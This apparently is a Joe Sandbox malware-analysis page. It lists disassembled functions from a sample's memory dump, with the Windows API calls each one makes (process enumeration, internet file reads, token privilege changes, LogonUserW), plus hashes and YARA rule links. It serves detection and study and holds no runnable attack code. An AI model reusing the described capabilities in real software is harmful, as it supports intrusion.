Instruction ID: f218043a7e125f1cc9e47a7cdeea2799b4c41503adcdcb620142faa30725476b
Opcode Fuzzy Hash: 17a94a45387de66162ba58143e6b5bf085980200f8a66087ec221757108926e1
Instruction Fuzzy Hash: 87D0EC78A10712CFD7609B31D818F0676D5AF45351B25883E9486D6650EB7CE884C65D

Function 004BEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004BEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 004BEE4B

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Process32NextW.KERNEL32(00000000,?), ref: 004BEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 004BEF1A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 64b29054595e63127145667b6e13a4678294aa8cca6752524daba73a68d657c9
Instruction ID: 375f8ebebfe2d43b1ed418d970f13cc7aa3f367c0fcd171a780dea30ece764e2
Opcode Fuzzy Hash: 64b29054595e63127145667b6e13a4678294aa8cca6752524daba73a68d657c9
Instruction Fuzzy Hash: 5C517F71504300AFE310EF25CC85EABB7E8EF94714F10482EF595962A2DB74E909CB96

Function 0049E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0049E628

Strings

(, xrefs: 0049E66E
|, xrefs: 0049E658

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 8e633780708c2071a63bfd85ed16dd031db9be0abcb742e1b9132d47b368df2d
Instruction ID: a541d32e3ba3855e05c0d4f429adad57aae99470bba167babc41765ea3e9da95
Opcode Fuzzy Hash: 8e633780708c2071a63bfd85ed16dd031db9be0abcb742e1b9132d47b368df2d
Instruction Fuzzy Hash: A4323575A007059FDB28CF5AC48196ABBF0FF48310B15C56EE89ADB3A1E774E941CB44

Function 004B22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004B180A,00000000), ref: 004B23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004B2418

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 86350a3fb1721f24c08c0284c8eac603d9633cd536ad9eff5c9de4bd0465fe4a
Instruction ID: 60e599423bd64d759bc1e58f9a24d761ea4a6ddcaeb319bc66d6cfd4df293c96
Opcode Fuzzy Hash: 86350a3fb1721f24c08c0284c8eac603d9633cd536ad9eff5c9de4bd0465fe4a
Instruction Fuzzy Hash: 44410671600209BFEB109EA5DE81EFF77ECEB40314F10406FFA01A6640EABD9E419679

Function 004AB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004AB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004AB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004AB3EA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 191b2fdc13ec689146c53c4b202cc2de55bc5fd604990b54c5fd91268706dafb
Instruction ID: 2cf0928e51f0fa1ec41a842083509249ebbcd022c1706c30e25487b43b8cb70f
Opcode Fuzzy Hash: 191b2fdc13ec689146c53c4b202cc2de55bc5fd604990b54c5fd91268706dafb
Instruction Fuzzy Hash: 1C215135A10108EFDB00EF96D881EEEBBB8FF49314F1480AAE905AB351DB359D19CB55

Function 004987E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00460DB6: std::exception::exception.LIBCMT ref: 00460DEC
Part of subcall function 00460DB6: __CxxThrowException@8.LIBCMT ref: 00460E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0049882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00498858
GetLastError.KERNEL32 ref: 00498865

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 6a9292acdca4c60b2ffdc4f894a542f0618aaa9095d21e9519bc1b309b6c2bcb
Instruction ID: 54bf4f38c40ca8b4907d4c968a684dfff2a2a7d1c86e85faa00b656dcbf10764
Opcode Fuzzy Hash: 6a9292acdca4c60b2ffdc4f894a542f0618aaa9095d21e9519bc1b309b6c2bcb
Instruction Fuzzy Hash: C211BFB2404204AFEB18EFA4DC85D2BBBF9EB05710B20853EF45583201EB38BC048B64

Function 0049874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00498774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0049878B
FreeSid.ADVAPI32(?), ref: 0049879B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f5b62813bbe9dbb52d44534e9eadb03026eb270051fdbe4919a67d25ab9d79f6
Instruction ID: acf90cab6c2b585673aab02613ec37c9af3d571b44b75ebdbce3dd8bcf2eb5cd
Opcode Fuzzy Hash: f5b62813bbe9dbb52d44534e9eadb03026eb270051fdbe4919a67d25ab9d79f6
Instruction Fuzzy Hash: 8FF04975A1130CBFDF00DFF4DC89EAEBBBDEF08601F1044B9A901E2281E6756A088B54

Function 004A8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 004A889B

Part of subcall function 0046520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004A8F6E,00000000,?,?,?,?,004A911F,00000000,?), ref: 00465213
Part of subcall function 0046520A: __aulldiv.LIBCMT ref: 00465233

Strings

0eP, xrefs: 004A8892

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eP
API String ID: 2893107130-2831938196
Opcode ID: b8d7661c1569f265453c0b3c63a8ef1767a106779813941f7bee57c2a9513935
Instruction ID: 57c3e98ec5236bd6aae808e48bc3b08af6c24b6ae90b967b0970d3336faf7f68
Opcode Fuzzy Hash: b8d7661c1569f265453c0b3c63a8ef1767a106779813941f7bee57c2a9513935
Instruction Fuzzy Hash: E921AF326256108BC729CF29D841A56B7E5EFB5311B688E6DD0F5CB2C0CE38A909DB54

Function 004AC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004AC6FB
FindClose.KERNEL32(00000000), ref: 004AC72B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 988efb2c438b9e1828d66cff9a6347eb55a1e58dc18f9617ab0b00b8d7d72b4a
Instruction ID: 1fbf7eb90c074952f6747de960ce57861d446e8d679db8985a59127a3506ca68
Opcode Fuzzy Hash: 988efb2c438b9e1828d66cff9a6347eb55a1e58dc18f9617ab0b00b8d7d72b4a
Instruction Fuzzy Hash: BF11A5756102049FDB10EF29D88592AF7E5FF85324F00851EF8A5D7290DB34AC05CF85

Function 004AA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004B9468,?,004CFB84,?), ref: 004AA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004B9468,?,004CFB84,?), ref: 004AA0A9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 074803150d4f43d28dc48358afbecd1bc136bc3cf34cd98dfa81ca4df0af862b
Instruction ID: d4627c8c14c7a319b96fbccf64e2bba166d9915f415b35bd312f6bded97b95b5
Opcode Fuzzy Hash: 074803150d4f43d28dc48358afbecd1bc136bc3cf34cd98dfa81ca4df0af862b
Instruction Fuzzy Hash: 5EF0E23510422DBBDB609FA4CC48FEA776DBF09361F00816AF908D2190C7349904CBA5

Function 004981CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00498309), ref: 004981E0
CloseHandle.KERNEL32(?,?,00498309), ref: 004981F2

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 24a66952316a02fc0f68f6d6c09a85e28b055f1ae53dd0e77d9d794666ecf4ba
Instruction ID: afea8adf892c09db48555d0674ca1c89c2fee9d2aca640e7ebdb141bd3fa364e
Opcode Fuzzy Hash: 24a66952316a02fc0f68f6d6c09a85e28b055f1ae53dd0e77d9d794666ecf4ba
Instruction Fuzzy Hash: BDE0EC72010620AFEB652B65EC09D777BEAEF043147148C3EF8A684471DB66AC95DB18

Function 0046A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00468D57,?,?,?,00000001), ref: 0046A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0046A163

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7888df25bbb055a9ad662a9901bc4b6009adeddea051ad31be30cb27f339bed1
Instruction ID: ca866a5007ca563f22a564422b48a58078b9faa99d8a3cefeaf128a7ecf18408
Opcode Fuzzy Hash: 7888df25bbb055a9ad662a9901bc4b6009adeddea051ad31be30cb27f339bed1
Instruction Fuzzy Hash: E0B09231054248BBCA802B91EC09F883F6AEB84AA2F404030FE0D84C70CB6656548A99

Function 0046F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f3a92dd119f1bd1639fca47612a682982b9879e67485f2669070c6f079cede
Instruction ID: fef51682dfdeb8e3c39848d4553ebd55b894f055cac20744d451e3d04811059a
Opcode Fuzzy Hash: 42f3a92dd119f1bd1639fca47612a682982b9879e67485f2669070c6f079cede
Instruction Fuzzy Hash: 27321461D2AF014DD7239634E832336A348AFB73C8F15D737E859B5AA6FB28D4874105

Function 0047242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a73b28b823ae3074521bf19b119b7885d37298e06d1659522be723b26c517e
Instruction ID: dcb90475503fd299e590c0994f0147678234599c4f7ca6447c295e98f7832f54
Opcode Fuzzy Hash: 96a73b28b823ae3074521bf19b119b7885d37298e06d1659522be723b26c517e
Instruction Fuzzy Hash: 81B1F020E2AF414DD72396398931336BB5CAFBB2C5F52D72BFC2A70D22EB2185934145

Function 004A4C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 004A4C76

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 09ecb04e343ef9971f30615df86028476b8fc647942e6cfab15a7774d4df62b7
Instruction ID: ef2bc81d0dcc2184347d5ea3de991d7cf0ee0465b3efc70a424e9a819d51488e
Opcode Fuzzy Hash: 09ecb04e343ef9971f30615df86028476b8fc647942e6cfab15a7774d4df62b7
Instruction Fuzzy Hash: 0DD05EA012220878ECE807208D4FF7F9109E3E27A1F96A14B7249852C1E8EC6801A03D

Function 004987B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00498389), ref: 004987D1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 710673a634180ecd80c5bfbe9b95193331354f120eee63ec073e13739debb44d
Instruction ID: d23f7e8613c6f18cbc2cda0bccbf61d31fb8b3900d6dbe8da45988fb43d20144
Opcode Fuzzy Hash: 710673a634180ecd80c5bfbe9b95193331354f120eee63ec073e13739debb44d
Instruction Fuzzy Hash: 55D05E3226050EABEF018EA4DC01EAE3B6AEB04B01F408121FE15C50A1C775E835AB60

Function 0046A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0046A12A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1e44fc5df999578ef7af02229886fa5e2692be685edd17e989c2c2ddaee9168c
Instruction ID: efba48a5cd8274fbb023f87d2bc0e66f7827656733342cf60ff4685433311d62
Opcode Fuzzy Hash: 1e44fc5df999578ef7af02229886fa5e2692be685edd17e989c2c2ddaee9168c
Instruction Fuzzy Hash: DCA0123000010CB78A001B41EC048447F5DD6401907004030F80C40831873255104584

Function 00458808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d94cb7b02b119619d81960ae7e596627dfa4bf137ecddc43c72540a41747d24
Instruction ID: 01ea28f85c26a986d66ed49bb9c371d2528694cd41803c07ea54d744916522b3
Opcode Fuzzy Hash: 8d94cb7b02b119619d81960ae7e596627dfa4bf137ecddc43c72540a41747d24
Instruction Fuzzy Hash: E9222530A045068BDF298B54C49467E7BA1FB41305F38807FDD86A6693DF7C9C9ACB4A

Function 004621C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 707533539f907f4aa5d93e6c1aaf01fb58850596635316ed13230acae0b95ace
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: FBC1D3322054A30ADB6D4639853403FBBA15EA27B131E076FD8B3CB2D4FE28D965D625

Function 004625FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 7f24eb704bbd740e53a78dd14c004388fe42f04e432a064aa24377ed5a5430ca
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: CDC1F5322055930ADF6D463AC53403FBAA15EA27B131E036FD4B3DB2D4FE28D925E625

Function 00461978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
